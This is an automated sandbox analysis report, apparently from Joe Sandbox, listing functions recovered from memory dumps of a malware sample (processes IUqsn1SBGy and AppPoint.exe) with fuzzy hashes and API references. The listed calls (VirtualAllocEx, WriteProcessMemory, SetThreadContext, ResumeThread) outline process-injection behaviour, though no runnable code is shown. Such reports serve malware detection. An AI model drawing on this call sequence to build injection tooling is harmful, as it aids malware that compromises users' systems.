Opcode Fuzzy Hash: 84b6afb8c2082d6fe3764140e609df51fd641eaf309634a2721c31c62ce9a960
Instruction Fuzzy Hash: B6D0A73124B3E20BC74616681E203F63B578B82210B0905CFF0E897597C9085A5343D1

Function 06FC29E8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4545849570.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6fc0000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3406291adee3d4709d0df73e86aadfda419f386f5b1d031d438869a3e1d7bec0
Instruction ID: c391c9a5cb3bec50e5428166bd999a6e6005be92f22366ccc5f386f001905d5e
Opcode Fuzzy Hash: 3406291adee3d4709d0df73e86aadfda419f386f5b1d031d438869a3e1d7bec0
Instruction Fuzzy Hash: 71E08670900209EFCB00FFE4EA4186DBBB9FB45318B1081A5D80493708DB326F00DB51

Function 06FC5410 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4545849570.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6fc0000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e1f32007f37c529fa423b09d8d72eea50a60cfa2b3fae3dd58af4625581862d
Instruction ID: b52f0099c14f39c79c2721ca5cd767a16cd1c9e8c999d05a18284bd36387cb15
Opcode Fuzzy Hash: 3e1f32007f37c529fa423b09d8d72eea50a60cfa2b3fae3dd58af4625581862d
Instruction Fuzzy Hash: 4DB09B2131513513DA48719D69206BD72CE47C5574F41006B951D877855CC59C4202DA

Function 06FC3FA3 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4545849570.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6fc0000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c3ef8e7f7cd4d63c284cf360de09079dbb39efa050fd5c2268a36015d537ede
Instruction ID: fe5793e24e548d289afc1de1f36679af0af0078c18abd2e63e5a7e71bd58b497
Opcode Fuzzy Hash: 6c3ef8e7f7cd4d63c284cf360de09079dbb39efa050fd5c2268a36015d537ede
Instruction Fuzzy Hash: 29D09272D4021ACFEF688F81D9187EEBBB0BB04369F108819E011A6184CBB94949CF81

Function 06FC2770 Relevance: .0, Instructions: 9COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4545849570.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6fc0000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a8b58ab4182e88a8cd653ab21403bfb950d8c8a302c94c3db6aa8708b2b85f8
Instruction ID: 4501dc79b7a755f9bff7d4e43a977765e8ec51e31f4e706ec343b3aa75907c69
Opcode Fuzzy Hash: 7a8b58ab4182e88a8cd653ab21403bfb950d8c8a302c94c3db6aa8708b2b85f8
Instruction Fuzzy Hash: A8C012704411018ADF189F2C91485143A60EF51324B300A4D901589191C272C547C7C1

Function 06FC4097 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.4545849570.0000000006FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FC0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6fc0000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b44ada0ed7a61795f8919db0593cbdfe755e8e1a831fb7bfd636d6cda26a997f
Instruction ID: f2b953c211589121c991d8b9860617c9bce2cea9ab88fb603d078a18035479c7
Opcode Fuzzy Hash: b44ada0ed7a61795f8919db0593cbdfe755e8e1a831fb7bfd636d6cda26a997f
Instruction Fuzzy Hash: 3DC09B704016008FDF18DF1CD5486413F61AF54329B30038CD02C491D2C372C583DBD1

Non-executed Functions

Function 066FAED0 Relevance: 10.3, Strings: 8, Instructions: 251COMMON

Download Yara Rule

Strings

$]q, xrefs: 066FB064
$]q, xrefs: 066FAFDE
$]q, xrefs: 066FB0AC
$]q, xrefs: 066FB0A0
$]q, xrefs: 066FB033
$]q, xrefs: 066FB070
$]q, xrefs: 066FB03F
$]q, xrefs: 066FAFD2

Memory Dump Source

Source File: 00000005.00000002.4543185639.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_66f0000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1273862796
Opcode ID: a6a81799a3fc3000e6f9b2c8f6525c52a5434a3576eb2afc59b362607cab4d3e
Instruction ID: 83e34e6e2d4a4a6e000059bb2eef35483048ee70f8c0e5d3b839173815ba9448
Opcode Fuzzy Hash: a6a81799a3fc3000e6f9b2c8f6525c52a5434a3576eb2afc59b362607cab4d3e
Instruction Fuzzy Hash: 51919170A20209DFDB68EFB9C990B6E76F6EF84344F108529E6069B394DF759C41CB90

Function 066F70C0 Relevance: 9.2, Strings: 7, Instructions: 437COMMON

Download Yara Rule

Strings

$]q, xrefs: 066F75F7
$]q, xrefs: 066F7587
$]q, xrefs: 066F73D6
$]q, xrefs: 066F7346
$]q, xrefs: 066F7603
$]q, xrefs: 066F73CA
.5uq, xrefs: 066F7112

Memory Dump Source

Source File: 00000005.00000002.4543185639.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_66f0000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: .5uq$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-981061697
Opcode ID: 5341f90ea6ab4003c95d2c2a294f3e1a5a8497b900e42326ba081f7ee155fe0e
Instruction ID: 3a6deeba1ab577d21d6b90a32ba7804e255f637dd04c00745fcaa6936b1b22fa
Opcode Fuzzy Hash: 5341f90ea6ab4003c95d2c2a294f3e1a5a8497b900e42326ba081f7ee155fe0e
Instruction Fuzzy Hash: 1DF16C30B102098FDB58EBB9D550AAEBBE7FF84344F20842DD51A9B395DB359C42CB91

Function 066FC4A8 Relevance: 7.7, Strings: 6, Instructions: 202COMMON

Download Yara Rule

Strings

$]q, xrefs: 066FC68F
$]q, xrefs: 066FC6C3
$]q, xrefs: 066FC65B
$]q, xrefs: 066FC6B7
$]q, xrefs: 066FC64F
$]q, xrefs: 066FC683

Memory Dump Source

Source File: 00000005.00000002.4543185639.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_66f0000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3723351465
Opcode ID: ad01f82f21eb8c790676809c6886e43f6b1cbed986bbc686140486ab13b707e5
Instruction ID: 85605d73e437d2dd3c8596b7d645d4b5d8087f36233239ea0ec173851aad2539
Opcode Fuzzy Hash: ad01f82f21eb8c790676809c6886e43f6b1cbed986bbc686140486ab13b707e5
Instruction Fuzzy Hash: 0C71DE30F2420D8FDB68CF69D55066EBBE6EF85704F104869E506EB384DB34E946CB81

Function 066F8590 Relevance: 5.3, Strings: 4, Instructions: 300COMMON

Download Yara Rule

Strings

$]q, xrefs: 066F8881
$]q, xrefs: 066F888D
$]q, xrefs: 066F8822
$]q, xrefs: 066F8816

Memory Dump Source

Source File: 00000005.00000002.4543185639.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_66f0000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 13e0edd8d4acc8c2a09ad97807a15839a63d7aa223d708ab95dd23563622c7ce
Instruction ID: d7644aa69ffc013b9db9571d7675c8e08f694fc6cfa2bc5bbeb34c520e2f1c31
Opcode Fuzzy Hash: 13e0edd8d4acc8c2a09ad97807a15839a63d7aa223d708ab95dd23563622c7ce
Instruction Fuzzy Hash: BEB13A30A202098FDB58EFA9C5506AEB6F6FF84314F24886DD50A9B355DF35DC82CB91

Function 066F89E0 Relevance: 5.2, Strings: 4, Instructions: 192COMMON

Download Yara Rule

Strings

$]q, xrefs: 066F8A7B
$]q, xrefs: 066F8A6F
LR]q, xrefs: 066F8B4C
LR]q, xrefs: 066F8AE6

Memory Dump Source

Source File: 00000005.00000002.4543185639.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_66f0000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: LR]q$LR]q$$]q$$]q
API String ID: 0-3527005858
Opcode ID: 2e6ad112c3a3130bb7d54697fa2a36bf443cf4a18baa9585531d433650110871
Instruction ID: d4c75a513908c24d79ee05cb6976e918883f66f59994f04b9c24cc7c8793ed2e
Opcode Fuzzy Hash: 2e6ad112c3a3130bb7d54697fa2a36bf443cf4a18baa9585531d433650110871
Instruction Fuzzy Hash: 4C61D330B202069FCB58EB78C950A6EB6F6FF88654F1085ADD6069B394DB31EC01C791

Function 066FB298 Relevance: 5.2, Strings: 4, Instructions: 169COMMON

Download Yara Rule

Strings

$]q, xrefs: 066FB432
$]q, xrefs: 066FB3D9
$]q, xrefs: 066FB496
$]q, xrefs: 066FB467

Memory Dump Source

Source File: 00000005.00000002.4543185639.00000000066F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_66f0000_IUqsn1SBGy.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 0f106164eb063a91d3f0066ed1c6c9ccf0fa794d303cea452d6060e56731ed0b
Instruction ID: fb04633fb4bf20e905224e6677eb81dae319afa74a69a9e86104138df81e22a1
Opcode Fuzzy Hash: 0f106164eb063a91d3f0066ed1c6c9ccf0fa794d303cea452d6060e56731ed0b
Instruction Fuzzy Hash: 1151A134F202059FDB68DB68D590AAEB7E7EF88214F104529D606D7355DF31DC42CB51

Analysis Process: AppPoint.exePID: 7392, Parent PID: 1028COMMON

Execution Graph

Execution Coverage:	13.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	279
Total number of Limit Nodes:	17

Executed Functions

Function 04E63F64 Relevance: 1.8, APIs: 1, Instructions: 254processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04E641A6

Memory Dump Source

Source File: 00000008.00000002.2278406573.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e60000_AppPoint.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: d93172327ef92474aaa11bc8c06929b17c4f2b34fd67d410b5fb486df32b34ac
Instruction ID: e0aa8fe1567d11ffb124e2ff218d4aa83fc26c604e02c9da5fd383b9ea5e1a0b
Opcode Fuzzy Hash: d93172327ef92474aaa11bc8c06929b17c4f2b34fd67d410b5fb486df32b34ac
Instruction Fuzzy Hash: 75A1B271D40229CFDF24CFA8C8417EEBBB2BF44344F149169D80AA7280DB75A985CF96

Function 04E63F70 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 04E641A6

Memory Dump Source

Source File: 00000008.00000002.2278406573.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e60000_AppPoint.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 20868a01026ea8f6a14e3670cea35fac7068cc2d9ac050519a6f963d10a23b70
Instruction ID: 3ba326553df0fc2f752602ae4381c4cde039ff3be1d6904bd30a6a7e3c5ed2d0
Opcode Fuzzy Hash: 20868a01026ea8f6a14e3670cea35fac7068cc2d9ac050519a6f963d10a23b70
Instruction Fuzzy Hash: 3791A071D00229CFEF24CFA8C8417EEBBB2BF44354F148169D809A7280DB75A985CF96

Function 00C68CF5 Relevance: 1.6, APIs: 1, Instructions: 101COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00C68DB1

Memory Dump Source

Source File: 00000008.00000002.2273904789.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c60000_AppPoint.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: c4c27ff8e8d1bced287325784bd217918cf5965d9aea4d9501fe171b84822341
Instruction ID: e9b8e77e6af26178da1ea78db2497c94d8b59fe24ba88bf7bd817e195acb96c9
Opcode Fuzzy Hash: c4c27ff8e8d1bced287325784bd217918cf5965d9aea4d9501fe171b84822341
Instruction Fuzzy Hash: 384122B0D00619CFDB25CFAAC884BDDBBF5BF48304F20816AD018AB255DB75694ACF91

Function 00C67804 Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

CreateActCtxA.KERNEL32(?), ref: 00C68DB1

Memory Dump Source

Source File: 00000008.00000002.2273904789.0000000000C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_c60000_AppPoint.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 597e8ec6777f0883515b71bc7bd11689a06f445c50497200e9ed88107fd92152
Instruction ID: e2240b236c1d404e64fe30a05cbd828c4696343e6be330ef597aace337f22713
Opcode Fuzzy Hash: 597e8ec6777f0883515b71bc7bd11689a06f445c50497200e9ed88107fd92152
Instruction Fuzzy Hash: BF4102B0C0061DCBDB24CFAAC884BDDBBF5BF48304F20816AD519AB255DB75694ACF91

Function 08F5CA90 Relevance: 1.6, APIs: 1, Instructions: 86COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2280515912.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8f50000_AppPoint.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: c8600eab580763492ef75f29e162c9e83e9cc3b7f6537dac51c706a96cf17e53
Instruction ID: 832bf93f4434a02dfa2d16b45304e6ad08f92faf46062b04110c472f578bb4b9
Opcode Fuzzy Hash: c8600eab580763492ef75f29e162c9e83e9cc3b7f6537dac51c706a96cf17e53
Instruction Fuzzy Hash: D0318D72900348AFCB11DFA9D804AEEBFF8EF09310F14805AEA55A7261C335D994CFA1

Function 08F5BD91 Relevance: 1.6, APIs: 1, Instructions: 74COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,08F5BD7D,?,?), ref: 08F5BE2F

Memory Dump Source

Source File: 00000008.00000002.2280515912.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8f50000_AppPoint.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: 830e9ca13ef117dcde08e49367823b6003a58678a388dffdd8d23ca47f67e57a
Instruction ID: a6a293dfbd4f59c540b218f1671b8439e57fc29c3bda49904d544fd8e885d8f8
Opcode Fuzzy Hash: 830e9ca13ef117dcde08e49367823b6003a58678a388dffdd8d23ca47f67e57a
Instruction Fuzzy Hash: E231E4B5D002099FDB10CFAAD8846DEFBF5FB48320F14842EE919A7210D774AA44CFA1

Function 08F5ACD4 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

DrawTextExW.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,08F5BD7D,?,?), ref: 08F5BE2F

Memory Dump Source

Source File: 00000008.00000002.2280515912.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8f50000_AppPoint.jbxd

Similarity

API ID: DrawText
String ID:
API String ID: 2175133113-0
Opcode ID: a9e0fe88fe8001529d53435c33c71de4cad12092db4a92ded8beb495f0ced9d4
Instruction ID: cfc5487b57eddc0b9db5ad8cf4baced24ff90df566e1314181913316f0afc5a9
Opcode Fuzzy Hash: a9e0fe88fe8001529d53435c33c71de4cad12092db4a92ded8beb495f0ced9d4
Instruction Fuzzy Hash: 9131B2B5D006499FDB10CF9AD8846AEFBF5FB48320F14842EE919A7210D775A944CFA1

Function 04E63CE0 Relevance: 1.6, APIs: 1, Instructions: 72injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04E63D78

Memory Dump Source

Source File: 00000008.00000002.2278406573.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e60000_AppPoint.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 07b03db2fd2db3422ee43c0a661ad0c27d4f8b9d822319866a9e1fae5c55fa4d
Instruction ID: 5ae627c34279bcbd123455bf8fb2e1095952be101a4067b4a4328f0f0b96f4ec
Opcode Fuzzy Hash: 07b03db2fd2db3422ee43c0a661ad0c27d4f8b9d822319866a9e1fae5c55fa4d
Instruction Fuzzy Hash: 102137B19003499FCB10CFA9C881BEEBBF1FF48310F14842AE919A7240C779A945CFA1

Function 04E63DD0 Relevance: 1.6, APIs: 1, Instructions: 70COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E63E58

Memory Dump Source

Source File: 00000008.00000002.2278406573.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e60000_AppPoint.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: eeda797aa1a1762d3f2f12f17eb725a55ef2e91d02d58b7e3274db5950eb6d68
Instruction ID: b6d51a96164c1328a502d058e1e08c3cd46a1c992821a38259e4491827c5a713
Opcode Fuzzy Hash: eeda797aa1a1762d3f2f12f17eb725a55ef2e91d02d58b7e3274db5950eb6d68
Instruction Fuzzy Hash: 63215AB1D003499FCB10CFA9C881AEEFBF5FF48310F508429E919A3240C739A945CBA1

Function 04E63CE8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 04E63D78

Memory Dump Source

Source File: 00000008.00000002.2278406573.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e60000_AppPoint.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 47f17586cd15de070aa173b66313d58c1b856c9d8c92e34699c2ecde46aec8a7
Instruction ID: d5adaa52d26b4ccbf47e1cbe72f2096e38f16b64d1f7043ddfa648359b9d3c66
Opcode Fuzzy Hash: 47f17586cd15de070aa173b66313d58c1b856c9d8c92e34699c2ecde46aec8a7
Instruction Fuzzy Hash: A32139B19003499FCB10DFAAC885BEEBBF5FF48310F108429E919A7240C778A944CBA1

Function 04E63B49 Relevance: 1.6, APIs: 1, Instructions: 65threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E63BCE

Memory Dump Source

Source File: 00000008.00000002.2278406573.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e60000_AppPoint.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: f74f67612c24524d8e05e1f5096d3563ca92d73f9f94816d01cfe7e6914ea80a
Instruction ID: 90bf4b26486dd5a1b0308954e220d9efcede4db62c5b0eb70ae6936024d4788e
Opcode Fuzzy Hash: f74f67612c24524d8e05e1f5096d3563ca92d73f9f94816d01cfe7e6914ea80a
Instruction Fuzzy Hash: 9C2128719002098FDB14DFAAC4857EEFBF4EF88314F14842AD519A7241C778A945CFA1

Function 04E63DD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 04E63E58

Memory Dump Source

Source File: 00000008.00000002.2278406573.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e60000_AppPoint.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 205c372da048ae2e1536bf74fa6395b19d907264a93e741f1e72d907a440cd2c
Instruction ID: 30d2bd4650a461e7dc370663c1fabe3cccff99d973ef5b360c7cf11ac1d9e6ee
Opcode Fuzzy Hash: 205c372da048ae2e1536bf74fa6395b19d907264a93e741f1e72d907a440cd2c
Instruction Fuzzy Hash: E72139B1C003499FCB10DFAAC881AEEFBF5FF48310F508429E919A7240C779A545CBA1

Function 04E63B50 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 04E63BCE

Memory Dump Source

Source File: 00000008.00000002.2278406573.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e60000_AppPoint.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: ed6722da22620ca8a20c0271df216fe289d099b025b1dab62bb589001f4d77a6
Instruction ID: aaeb7ea06b0b91369d8f0eaf18c936c3b3ba0eed875675a6e8a62dc1ca2a60b6
Opcode Fuzzy Hash: ed6722da22620ca8a20c0271df216fe289d099b025b1dab62bb589001f4d77a6
Instruction Fuzzy Hash: AF211871D006098FDB10DFAAC4857EEFBF4EF48354F14842AD51AA7240CB78A945CFA1

Function 09167D0B Relevance: 1.6, APIs: 1, Instructions: 58memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 09167D83

Memory Dump Source

Source File: 00000008.00000002.2281070325.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9160000_AppPoint.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 3203bf46e5a2795d96ddb2f09a11f268ab55388a631c6c09a9f11ab399530471
Instruction ID: 11e97722b931ca35498bb88a6eb6fff008dd8c64afcdc37fc26125f1cda27880
Opcode Fuzzy Hash: 3203bf46e5a2795d96ddb2f09a11f268ab55388a631c6c09a9f11ab399530471
Instruction Fuzzy Hash: E921F4B5D006499FCB10DF9AC484ADEFBF5FB48314F108429E959A7250D378A644CFA1

Function 08F5AD44 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,08F5CAAA,?,?,?,?,?), ref: 08F5CB4F

Memory Dump Source

Source File: 00000008.00000002.2280515912.0000000008F50000.00000040.00000800.00020000.00000000.sdmp, Offset: 08F50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_8f50000_AppPoint.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: ddf05632d5ec26ea9c53b42ef677c947db54e171d267692e0a367b61cc6effc8
Instruction ID: 841a2781deae19197ed78e9c0b0bc98328c6ba1a02517b04ace00764be8079a3
Opcode Fuzzy Hash: ddf05632d5ec26ea9c53b42ef677c947db54e171d267692e0a367b61cc6effc8
Instruction Fuzzy Hash: A2113AB58003499FDB10DFAAC844BDEBFF8EB48310F14841AE919A7250D379A954DFA5

Function 09167D10 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 09167D83

Memory Dump Source

Source File: 00000008.00000002.2281070325.0000000009160000.00000040.00000800.00020000.00000000.sdmp, Offset: 09160000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_9160000_AppPoint.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 09ee077395cf2600efaf7c0809e87684a1b053ea490e71929a01cbd758585e43
Instruction ID: 928137d7970e27f60b3c4d6b4606f6340b48b7d23122377a361793a7774d66e0
Opcode Fuzzy Hash: 09ee077395cf2600efaf7c0809e87684a1b053ea490e71929a01cbd758585e43
Instruction Fuzzy Hash: BF2103B5D002499FCB10DF9AC484BDEFBF4FB48324F108429E959A7250D378A544CFA1

Function 04E63C20 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E63C96

Memory Dump Source

Source File: 00000008.00000002.2278406573.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e60000_AppPoint.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: a3d3482ed55cb0ccf8735310ee5fd8f7ff2fd27b8ff049794b09fb3cf43f173a
Instruction ID: 480074024e9cff6454b06fdc58d48c52cf6ed1915fe40bc5c6dcd875fb97fd76
Opcode Fuzzy Hash: a3d3482ed55cb0ccf8735310ee5fd8f7ff2fd27b8ff049794b09fb3cf43f173a
Instruction Fuzzy Hash: B81147758002499FCB20DFAAC845ADEFBF5FF48320F148819E52AA7290C779A540CBA1

Function 04E63660 Relevance: 1.6, APIs: 1, Instructions: 55threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 04E636CA

Memory Dump Source

Source File: 00000008.00000002.2278406573.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e60000_AppPoint.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 6d5e66d88e7be583153036dcb5dd0a7bd765940849780bf95eece7487afb0f06
Instruction ID: b91cb8b15e0d4919a55fbbbd625c7ca5c1cccd0fb263dd342b698bd5a4c5d6cf
Opcode Fuzzy Hash: 6d5e66d88e7be583153036dcb5dd0a7bd765940849780bf95eece7487afb0f06
Instruction Fuzzy Hash: E6118BB1D002488FCB20DFAAD4457EEFBF4EF89314F248819C51AA7300CB39A945CBA5

Function 04E63C28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 04E63C96

Memory Dump Source

Source File: 00000008.00000002.2278406573.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e60000_AppPoint.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 3c3bf46d2bd8ae3eb63efa681b94d8945b59d49b0be18ec45fac2c7c024ba7e6
Instruction ID: 50dfa7cb91e95ce68a83d4f9516323667b3a01a131abb2cc73eb1f210296694e
Opcode Fuzzy Hash: 3c3bf46d2bd8ae3eb63efa681b94d8945b59d49b0be18ec45fac2c7c024ba7e6
Instruction Fuzzy Hash: 5C1126718002499FCB10DFAAC845AEEBFF5EF48310F148419E51AA7250C779A554CBA1

Function 04E63668 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 04E636CA

Memory Dump Source

Source File: 00000008.00000002.2278406573.0000000004E60000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_4e60000_AppPoint.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 196f6fece0db894219a3973d5b386da285f9d958f3c562fae02ad00cd3fcefe4
Instruction ID: 4cadfddc3c12a4d81c109dbbf673f6da37cf7966bb94c3f251a0255778d63d95
Opcode Fuzzy Hash: 196f6fece0db894219a3973d5b386da285f9d958f3c562fae02ad00cd3fcefe4
Instruction Fuzzy Hash: 2B113AB1D002498FDB10DFAAC4457EEFBF5EF88314F248819D51AA7240CB79A545CBA5

Function 04E66AB8 Relevance: 1.5, APIs: 1, Instructions: 49windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 04E66B1D

Memory Dump Source

